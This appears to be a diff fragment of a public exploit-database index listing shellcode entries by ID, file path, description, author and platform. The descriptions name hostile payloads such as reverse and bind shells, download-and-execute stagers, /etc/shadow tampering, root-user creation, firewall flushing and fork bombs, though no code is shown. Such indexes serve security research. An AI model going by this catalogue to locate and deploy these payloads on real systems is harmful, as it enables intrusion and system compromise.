43703,shellcodes/linux_x86/43703.c,"Linux/x86 - execve(/bin/dash) Shellcode (49 bytes)",2009-01-01,Chroniccommand,shellcode,linux_x86
43704,shellcodes/linux_x86/43704.c,"Linux/x86 - execve(/bin/cat_ /etc/shadow_ NULL) Shellcode (42 bytes)",2009-01-01,antrhacks,shellcode,linux_x86
43705,shellcodes/linux_x86/43705.c,"Linux/x86 - /etc/init.d/apparmor teardown Shellcode (53 bytes)",2009-01-01,"John Babio",shellcode,linux_x86
@ -708,42 +707,82 @@ id,file,description,date,author,type,platform
43722,shellcodes/linux_x86/43722.c,"Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (2)",2009-01-01,"Hamza Megahed",shellcode,linux_x86
43725,shellcodes/linux_x86/43725.c,"Linux/x86 - Force Reboot Shellcode (36 bytes)",2009-01-01,"Hamza Megahed",shellcode,linux_x86
43724,shellcodes/linux_x86/43724.c,"Linux/x86 - execve(chmod 0777 /etc/shadow) Shellcode (57 bytes)",2009-01-01,"Hamza Megahed",shellcode,linux_x86
43726,shellcodes/linux_x86/43726.c,"Linux/x86 - Bind TCP (1111/TCP) Shell + SO_REUSEADDR Set (Avoiding SIGSEGV) Shellcode (103 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43727,shellcodes/linux_x86/43727.c,"Linux/x86 - Reverse TCP (127.1.1.1:55555/TCP) Shell Shellcode (72 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43728,shellcodes/linux_x86/43728.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell Shellcode (65 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43729,shellcodes/linux_x86/43729.c,"Linux/x86 - Bind TCP (1111/TCP) Shell + GetPC/Call/Ret Method Shellcode (89 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43730,shellcodes/linux_x86/43730.c,"Linux/x86 - Bind TCP (1111/TCP) Shell Shellcode (73 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43731,shellcodes/linux_x86/43731.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43732,shellcodes/linux_x86/43732.c,"Linux/x86 - Egghunter Shellcode (38 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
40549,shellcodes/windows_x86-64/40549.c,"Windows x64 - cmd.exe WinExec() Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40560,shellcodes/windows_x86/40560.asm,"Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)",2016-10-17,Fugu,shellcode,windows_x86
40781,shellcodes/windows_x86-64/40781.c,"Windows x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
43726,shellcodes/linux_x86/43726.c,"Linux/x86 - Bind TCP (1111/TCP) Shell + SO_REUSEADDR Set (Avoiding SIGSEGV) + Null-Free Shellcode (103 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43727,shellcodes/linux_x86/43727.c,"Linux/x86 - Reverse TCP (127.1.1.1:55555/TCP) Shell + Null-Free Shellcode (72 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43728,shellcodes/linux_x86/43728.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (65 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43729,shellcodes/linux_x86/43729.c,"Linux/x86 - Bind TCP (1111/TCP) Shell + GetPC/Call/Ret Method + Null-Free Shellcode (89 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43730,shellcodes/linux_x86/43730.c,"Linux/x86 - Bind TCP (1111/TCP) Shell + Null-Free Shellcode (73 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43731,shellcodes/linux_x86/43731.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43732,shellcodes/linux_x86/43732.c,"Linux/x86 - Egghunter (0x50905090) + Null-Free Shellcode (38 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43735,shellcodes/linux_x86/43735.c,"Linux/x86 - execve(/bin/sh) + Null-Free Shellcode (21 bytes) (6)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43736,shellcodes/linux_x86/43736.c,"Linux/x86 - Read /etc/passwd file + Null-Free Shellcode (51 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43737,shellcodes/linux_x86/43737.c,"Linux/x86 - Reboot() + Mutated + Null-Free Shellcode (55 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43738,shellcodes/linux_x86/43738.c,"Linux/x86 - Fork Bomb + Mutated + Null-Free Shellcode (15 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43739,shellcodes/linux_x86/43739.c,"Linux/x86 - execve wget + Mutated + Null-Free Shellcode (96 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43740,shellcodes/linux_x86/43740.c,"Linux/x86 - execve(/bin/sh) + Uzumaki Encoded + Null-Free Shellcode (50 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43741,shellcodes/generator/43741.py,"Linux/x86 - Uzumaki Encryptor Shellcode (Generator)",2013-01-01,"Geyslan G. Bem",shellcode,generator
43742,shellcodes/linux_x86/43742.c,"Linux/x86 - Bind TCP (31337/TCP) Shell Shellcode (108 bytes)",2009-01-01,"Russell Willis",shellcode,linux_x86
43743,shellcodes/linux_x86/43743.c,"Linux/x86 - /proc/sys/net/ipv4/ip_forward 0 + exit() Shellcode (83 bytes)",2009-01-01,"Hamid Zamani",shellcode,linux_x86
43744,shellcodes/linux_x86/43744.c,"Linux/x86 - Egghunter (0x5090) Shellcode (38 bytes)",2013-05-28,"Russell Willis",shellcode,linux_x86
43745,shellcodes/linux_x86/43745.c,"Linux/x86 - execve(/bin/sh) + Obfuscated Shellcode (30 bytes)",2013-07-03,"Russell Willis",shellcode,linux_x86
43746,shellcodes/linux_x86/43746.c,"Linux/x86 - Bind TCP Shell Shellcode (112 bytes)",2013-07-03,"Russell Willis",shellcode,linux_x86
43747,shellcodes/linux_x86/43747.c,"Linux/x86 - Reverse TCP (127.1.1.1:12345/TCP) cat /etc/passwd Shellcode (111 bytes)",2009-01-01,"Daniel Sauder",shellcode,linux_x86
43748,shellcodes/linux_x86/43748.c,"Linux/x86 - Download File (http://192.168.2.222/x) + chmod() + execute Shellcode (108 bytes)",2009-01-01,"Daniel Sauder",shellcode,linux_x86
43749,shellcodes/linux_x86/43749.asm,"Linux/x86 - execve(/bin/sh) + Using jump/call/pop Shellcode (52 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86
43750,shellcodes/linux_x86/43750.asm,"Linux/x86 - Copy /etc/passwd to /tmp/outfile Shellcode (97 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86
43751,shellcodes/linux_x86/43751.asm,"Linux/x86 - shift-bit execve() Encoder Shellcode (114 bytes)",2009-01-01,"Shihao Song",shellcode,linux_x86
43752,shellcodes/linux_x86/43752.asm,"Linux/x86 - execve() Using JMP-FSTENV Shellcode (67 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86
43753,shellcodes/linux_x86/43753.c,"Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (51 bytes)",2014-06-22,"Osanda Malith Jayathissa",shellcode,linux_x86
43754,shellcodes/linux_x86/43754.c,"Linux/x86 - shutdown -h now Shellcode (56 bytes)",2014-06-27,"Osanda Malith Jayathissa",shellcode,linux_x86
43755,shellcodes/linux_x86/43755.c,"Linux/x86 - Bind TCP (1337/TCP) Shell Shellcode (89 bytes)",2014-07-13,"Julien Ahrens",shellcode,linux_x86
43756,shellcodes/linux_x86/43756.c,"Linux/x86 - Reverse TCP (127.1.1.1:1337/TCP) Shell Shellcode (74 bytes)",2014-07-25,"Julien Ahrens",shellcode,linux_x86
43757,shellcodes/linux_x86/43757.c,"Linux/x86 - setreuid() + execve(/usr/bin/python) Shellcode (54 bytes)",2014-05-08,"Ali Razmjoo",shellcode,linux_x86
43758,shellcodes/linux_x86/43758.txt,"Linux/x86 - execve() + ROT-7 Shellcode (Encoder/Decoder) (74 bytes)",2009-01-01,"Stavros Metzidakis",shellcode,linux_x86
43759,shellcodes/windows_x86/43759.asm,"Windows/x86 (NT/XP/2000/2003) - Bind TCP (8721/TCP) Shell Shellcode (356 bytes)",2009-01-01,"H D Moore",shellcode,windows_x86
43760,shellcodes/windows_x86/43760.asm,"Windows/x86 (2000) - Reverse TCP (192.168.0.247:8721/TCP) Connect + Vampiric Import Shellcode (179 bytes)",2009-01-01,"H D Moore",shellcode,windows_x86
43761,shellcodes/windows_x86/43761.asm,"Windows/x86 - Create Admin User (X) Shellcode (304 bytes)",2009-01-01,"H D Moore",shellcode,windows_x86
43762,shellcodes/windows_x86/43762.c,"Windows/x86 (XP SP3) (French) - Sleep 90 Seconds Shellcode (14 bytes)",2009-01-01,OpTix,shellcode,windows_x86
43763,shellcodes/windows_x86/43763.txt,"Windows/x86 (XP Professional SP2) (English) - Wordpad Shellcode (15 bytes)",2009-01-01,Aodrulez,shellcode,windows_x86
43764,shellcodes/windows_x86/43764.c,"Windows/x86 (XP Professional SP2) - calc Shellcode (57 bytes)",2009-01-01,cr4wl3r,shellcode,windows_x86
43765,shellcodes/windows_x86/43765.c,"Windows/x86 (XP Professional SP3) (French) - calc.exe Shellcode (31 bytes)",2009-01-01,agix,shellcode,windows_x86
43766,shellcodes/windows_x86/43766.asm,"Windows/x86 - Download File (http://skypher.com/dll) + LoadLibrary + Null-Free Shellcode (164 bytes)",2009-01-01,Skylined,shellcode,windows_x86
43767,shellcodes/windows_x86/43767.asm,"Windows/x86 - calc.exe + Null-Free Shellcode (100 bytes)",2009-01-01,Skylined,shellcode,windows_x86
43768,shellcodes/windows_x86/43768.asm,"Windows/x86 - Message Box + Null-Free Shellcode (140 bytes)",2009-01-01,Skylined,shellcode,windows_x86
43769,shellcodes/windows_x86/43769.c,"Windows/x86 (XP SP3) (Turkish) - MessageBoxA Shellcode (109 bytes)",2009-01-01,ZoRLu,shellcode,windows_x86
43770,shellcodes/windows_x86/43770.c,"Windows/x86 (XP SP3) (Turkish) - calc.exe Shellcode (53 bytes)",2009-01-01,ZoRLu,shellcode,windows_x86
43771,shellcodes/windows_x86/43771.c,"Windows/x86 (XP SP3) (Turkish) - cmd.exe Shellcode (52 bytes)",2009-01-01,ZoRLu,shellcode,windows_x86
43772,shellcodes/windows_x86/43772.c,"Windows/x86 (XP SP3) (Turkish) - cmd.exe Shellcode (42 bytes)",2009-01-01,ZoRLu,shellcode,windows_x86
43773,shellcodes/windows_x86/43773.c,"Windows/x86 (XP SP3) (English) - calc Shellcode (16 bytes)",2010-07-10,"John Leitch",shellcode,windows_x86
43774,shellcodes/windows_x86/43774.c,"Windows/x86 (XP SP3) - MessageBox Shellcode (11 bytes)",2009-01-01,d3c0der,shellcode,windows_x86
40549,shellcodes/windows_x86-64/40549.c,"Windows/x86-64 - cmd.exe WinExec() Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40560,shellcodes/windows_x86/40560.asm,"Windows/x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)",2016-10-17,Fugu,shellcode,windows_x86
40781,shellcodes/windows_x86-64/40781.c,"Windows/x86-64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40808,shellcodes/linux_x86-64/40808.c,"Linux/x86-64 - execve(/bin/sh) -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",shellcode,linux_x86-64
40821,shellcodes/windows_x86-64/40821.c,"Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40872,shellcodes/linux_x86/40872.c,"Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",shellcode,linux_x86
40924,shellcodes/linux_x86/40924.c,"Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution Null-Free Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",shellcode,linux_x86
40981,shellcodes/windows_x86-64/40981.c,"Windows x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
41072,shellcodes/windows_x86-64/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
41089,shellcodes/linux_x86-64/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",shellcode,linux_x86-64
40821,shellcodes/windows_x86-64/40821.c,"Windows/x86-64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40872,shellcodes/linux_x86/40872.c,"Linux/x86 - Reverse TCP Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",shellcode,linux_x86
40924,shellcodes/linux_x86/40924.c,"Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution + Null-Free Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",shellcode,linux_x86
40981,shellcodes/windows_x86-64/40981.c,"Windows/x86-64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
41072,shellcodes/windows_x86-64/41072.c,"Windows/x86-64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
41089,shellcodes/linux_x86-64/41089.c,"Linux/x86-64 - mkdir() Shellcode (25 bytes)",2017-01-18,"Ajith Kp",shellcode,linux_x86-64
41128,shellcodes/linux_x86-64/41128.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes)",2017-01-19,"Ajith Kp",shellcode,linux_x86-64
41174,shellcodes/linux_x86-64/41174.nasm,"Linux/x86-64 - execve(/bin/sh) Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",shellcode,linux_x86-64
41183,shellcodes/linux/41183.c,"Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes)",2017-01-29,odzhancode,shellcode,linux
41220,shellcodes/generator/41220.c,"Linux - Reverse TCP Shell + Multi/Dual Mode Shellcode (129 bytes) (Generator)",2017-02-02,odzhancode,shellcode,generator
41282,shellcodes/linux_x86/41282.nasm,"Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Alphanumeric + Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",shellcode,linux_x86
41375,shellcodes/linux/41375.c,"Linux - Bind TCP Shell + Dual/Multi Mode Shellcode (156 bytes)",2017-02-16,odzhancode,shellcode,linux
41381,shellcodes/windows_x86/41381.c,"Windows x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",shellcode,windows_x86
41381,shellcodes/windows_x86/41381.c,"Windows/x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",shellcode,windows_x86
41398,shellcodes/linux_x86-64/41398.nasm,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",shellcode,linux_x86-64
41403,shellcodes/linux_x86/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,shellcode,linux_x86
41439,shellcodes/linux_x86-64/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,shellcode,linux_x86-64
41467,shellcodes/windows_x86/41467.c,"Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes)",2017-02-26,lu0xheap,shellcode,windows_x86
41439,shellcodes/linux_x86-64/41439.c,"Linux/x86-64 - Egghunter (0xDEADC0DE) Shellcode (38 bytes)",2017-02-23,odzhancode,shellcode,linux_x86-64
41467,shellcodes/windows_x86/41467.c,"Windows/x86 - Executable Directory Search + Null-Free Shellcode (130 bytes)",2017-02-26,lu0xheap,shellcode,windows_x86
41468,shellcodes/linux_x86-64/41468.nasm,"Linux/x86-64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",shellcode,linux_x86-64
41477,shellcodes/linux_x86-64/41477.c,"Linux/x86-64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",shellcode,linux_x86-64
41481,shellcodes/windows_x86/41481.asm,"Windows x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes)",2017-03-01,"Snir Levi",shellcode,windows_x86
41481,shellcodes/windows_x86/41481.asm,"Windows/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes)",2017-03-01,"Snir Levi",shellcode,windows_x86
41498,shellcodes/linux_x86-64/41498.nasm,"Linux/x86-64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64
41503,shellcodes/linux_x86-64/41503.nasm,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) + Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64
41509,shellcodes/linux_x86-64/41509.nasm,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64
41510,shellcodes/linux_x86-64/41510.nsam,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64
41581,shellcodes/windows_x86/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",shellcode,windows_x86
41581,shellcodes/windows_x86/41581.c,"Windows/x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",shellcode,windows_x86
43433,shellcodes/linux_x86/43433.c,"Linux/x86 - Reverse TCP (127.1.1.1:8888/TCP) Shell (/bin/sh) + Null-Free Shellcode (67/69 bytes)",2018-01-05,"Nipun Jaswal",shellcode,linux_x86
43476,shellcodes/linux_x86/43476.c,"Linux/x86 - execve(/bin/dash) Shellcode (30 bytes)",2018-01-10,"Hashim Jawad",shellcode,linux_x86
43480,shellcodes/alpha/43480.c,"Alpha - /bin/sh Shellcode (80 bytes)",2009-01-01,"Lamont Granquist",shellcode,alpha
@ -765,7 +804,7 @@ id,file,description,date,author,type,platform
43512,shellcodes/irix/43512.c,"IRIX - stdin-read Shellcode (40 bytes)",2009-01-01,scut/teso,shellcode,irix
43520,shellcodes/arm/43520.c,"Linux/ARM - execve(_/bin/sh__ NULL_ 0) Shellcode (34 bytes)",2017-03-31,dummys,shellcode,arm
43530,shellcodes/arm/43530.c,"Linux/ARM - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (79 bytes)",2015-03-02,"Osanda Malith Jayathissa",shellcode,arm
43531,shellcodes/arm/43531.c,"Linux/ARM - chmod(_/etc/passwd__ 0777) Shellcode (39 bytes)",2013-09-04,gunslinger_,shellcode,arm
43531,shellcodes/arm/43531.c,"Linux/ARM - chmod( /etc/passwd 0777) Shellcode (39 bytes)",2013-09-04,gunslinger_,shellcode,arm
43532,shellcodes/arm/43532.c,"Linux/ARM - creat(_/root/pwned__ 0777) Shellcode (39 bytes)",2013-09-04,gunslinger_,shellcode,arm
43533,shellcodes/arm/43533.c,"Linux/ARM - execve(_/bin/sh__ []_ [0 vars]) Shellcode (35 bytes)",2013-09-04,gunslinger_,shellcode,arm
43534,shellcodes/arm/43534.c,"Linux/ARM - execve(_/bin/sh__NULL_0) Shellcode (31 bytes)",2010-08-31,"Jonathan Salwan",shellcode,arm
@ -776,46 +815,47 @@ id,file,description,date,author,type,platform
43545,shellcodes/linux_sparc/43545.c,"Linux/SPARC - setreuid(0_0) + execve(/bin/sh) Shellcode (64 bytes)",2009-01-01,anathema,shellcode,linux_sparc
43541,shellcodes/superh_sh4/43541.c,"Linux/SuperH (sh4) - execve(_/bin/sh__ 0_ 0) Shellcode (19 bytes)",2011-06-22,"Florian Gaultier",shellcode,superh_sh4
43542,shellcodes/superh_sh4/43542.c,"Linux/SuperH (sh4) - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (132 bytes)",2009-01-01,Dad_,shellcode,superh_sh4
43546,shellcodes/linux_sparc/43546.c,"Linux/SPARC - setreuid(0_0) + standard execve() Shellcode (72 bytes)",2009-01-01,"Michel Kaempf",shellcode,linux_sparc
43546,shellcodes/linux_sparc/43546.c,"Linux/SPARC - setreuid(0_0) + execve() Shellcode (72 bytes)",2009-01-01,"Michel Kaempf",shellcode,linux_sparc
43549,shellcodes/linux_x86-64/43549.c,"Linux/x86-64 - Execute /bin/sh Shellcode (27 bytes)",2009-01-01,Dad_,shellcode,linux_x86-64
43550,shellcodes/linux_x86-64/43550.c,"Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
43551,shellcodes/linux_x86-64/43551.c,"Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)",2014-10-29,"Osanda Malith Jayathissa",shellcode,linux_x86-64
43552,shellcodes/linux_x86-64/43552.c,"Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
43553,shellcodes/linux_x86-64/43553.c,"Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
43554,shellcodes/linux_x86-64/43554.c,"Linux/x86-64 - sys_access() Egghunter Shellcode (49 bytes)",2009-01-01,Doreth.Z10,shellcode,linux_x86-64
43554,shellcodes/linux_x86-64/43554.c,"Linux/x86-64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes)",2009-01-01,Doreth.Z10,shellcode,linux_x86-64
43555,shellcodes/linux_x86-64/43555.c,"Linux/x86-64 - shutdown -h now Shellcode (65 bytes)",2014-06-27,"Osanda Malith Jayathissa",shellcode,linux_x86-64
43556,shellcodes/linux_x86-64/43556.asm,"Linux/x86-64 - shutdown -h now Shellcode (64 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64
43557,shellcodes/linux_x86-64/43557.asm,"Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64
43558,shellcodes/linux_x86-64/43558.asm,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)",2014-09-04,Keyman,shellcode,linux_x86-64
43559,shellcodes/linux_x86-64/43559.asm,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)",2014-09-03,Keyman,shellcode,linux_x86-64
43561,shellcodes/linux_x86-64/43561.asm,"Linux/x86-64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes)",2014-09-21,Keyman,shellcode,linux_x86-64
41630,shellcodes/linux_x86/41630.asm,"Linux/x86 - exceve /bin/sh Encoded Shellcode (44 bytes)",2017-03-17,WangYihang,shellcode,linux_x86
41630,shellcodes/linux_x86/41630.asm,"Linux/x86 - exceve(/bin/sh) + Encoded Shellcode (44 bytes)",2017-03-17,WangYihang,shellcode,linux_x86
41631,shellcodes/linux_x86/41631.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",shellcode,linux_x86
41635,shellcodes/linux_x86/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 bytes)",2017-03-19,WangYihang,shellcode,linux_x86
43734,shellcodes/linux_x86/43734.c,"Linux/x86 - Insertion Decoder + Null-Free Shellcode (33+ bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse TCP (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse TCP (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86
41750,shellcodes/linux_x86-64/41750.txt,"Linux/x86-64 - execve(/bin/sh) Shellcode (21 bytes)",2017-03-28,WangYihang,shellcode,linux_x86-64
41757,shellcodes/linux_x86/41757.txt,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (4)",2017-03-29,WangYihang,shellcode,linux_x86
41827,shellcodes/windows_x86-64/41827.txt,"Windows 10 x64 - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",shellcode,windows_x86-64
41827,shellcodes/windows_x86-64/41827.txt,"Windows/x86-64 (10) - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",shellcode,windows_x86-64
41883,shellcodes/linux_x86-64/41883.txt,"Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (2)",2017-04-13,WangYihang,shellcode,linux_x86-64
41909,shellcodes/linux_x86/41909.c,"Linux/x86 - Egghunter Shellcode (18 bytes)",2017-04-22,phackt_ul,shellcode,linux_x86
41909,shellcodes/linux_x86/41909.c,"Linux/x86 - Egghunter (0x50905090) + /bin/sh Shellcode (18 bytes)",2017-04-22,phackt_ul,shellcode,linux_x86
41969,shellcodes/linux_x86/41969.c,"Linux/x86 - Disable ASLR Security Shellcode (80 bytes)",2017-05-08,abatchy17,shellcode,linux_x86
41970,shellcodes/linux_x86-64/41970.asm,"Linux/x86-64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes)",2017-05-08,Srakai,shellcode,linux_x86-64
42016,shellcodes/windows/42016.asm,"Windows x86/x64 - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",shellcode,windows
42016,shellcodes/windows/42016.asm,"Windows/x86-64 / x86 - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",shellcode,windows
42126,shellcodes/linux_x86-64/42126.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (1)",2017-06-05,"Touhid M.Shaikh",shellcode,linux_x86-64
42177,shellcodes/linux_x86/42177.c,"Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,shellcode,linux_x86
42177,shellcodes/linux_x86/42177.c,"Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) + XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,shellcode,linux_x86
42179,shellcodes/linux_x86-64/42179.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,shellcode,linux_x86-64
42208,shellcodes/linux_x86/42208.nasm,"Linux/x86 - Reverse UDP (127.0.0.1:53/UDP) Shell (/bin/sh) Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",shellcode,linux_x86
42254,shellcodes/linux_x86/42254.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (75 bytes)",2017-06-26,wetw0rk,shellcode,linux_x86
42339,shellcodes/linux_x86-64/42339.c,"Linux/x86-64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,shellcode,linux_x86-64
42428,shellcodes/linux_x86/42428.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes)",2017-08-06,"Touhid M.Shaikh",shellcode,linux_x86
42428,shellcodes/linux_x86/42428.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (4)",2017-08-06,"Touhid M.Shaikh",shellcode,linux_x86
42485,shellcodes/linux_x86-64/42485.c,"Linux/x86-64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",shellcode,linux_x86-64
42522,shellcodes/linux_x86-64/42522.c,"Linux/x86-64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64
42523,shellcodes/linux_x86-64/42523.c,"Linux/x86-64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64
42594,shellcodes/linux_x86/42594.c,"Linux/x86 - Fork Bomb Shellcode (9 bytes)",2017-08-30,"Touhid M.Shaikh",shellcode,linux_x86
